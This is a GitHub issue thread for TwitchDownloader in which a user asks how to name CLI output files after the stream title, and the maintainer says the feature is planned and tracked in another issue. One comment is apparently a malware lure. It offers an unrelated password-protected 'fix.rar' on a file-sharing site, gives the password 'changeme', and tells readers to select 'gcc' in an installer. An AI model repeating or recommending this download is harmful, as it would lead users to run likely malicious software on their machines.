### ISSUE TITLE
Use stream name as filename in TwitchDownloadCLI?

### ISSUE THREAD

**Issue by AXYZE9** [lay295/TwitchDownloader#1195]
### Checklist

- [X] I have checked the [issue page](https://github.com/lay295/TwitchDownloader/issues?q=is%3Aissue) for duplicates
- [X] I am running the latest version ([download here](https://github.com/lay295/TwitchDownloader/releases/latest))

### Write your feature request here

In TwitchDownloadCLI I do not see option to dynamically set of output name in '**videodownload**' or '**chatdownload**' to the same value as '**stream name**'/'**stream id**' like it is possible to do in GUI version.

It is possible to have '**stream id**' as output name by creating a variable in bash, for example:
`stream=2233765169; TwitchDownloaderCLI -u $stream -o "${stream}.mp4"`

However I do not see how I can set stream name as output name.
We can get stream name by running TwitchDownloaderCLI info -u 2233765169 and it will be in 'Title' row, so theoretically we could get value from there, but this seems way too hacky.

Is there some non-hacky way to get stream name as output name in CLI? If not, is it planned?

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ScrubN** [comment]
This issue is being tracked in #468.

> Is there some non-hacky way to get stream name as output name in CLI? If not, is it planned?

At the moment it is not possible through TwitchDownloaderCLI, however it is indeed planned and among the issues I would like to work on next. Hoping for within the next few releases.

**Comment by JAK0723** [comment]
@AXYZE9 I've put together a script that I've shared in #468. It is a bit hacky, but it seems to work fine.
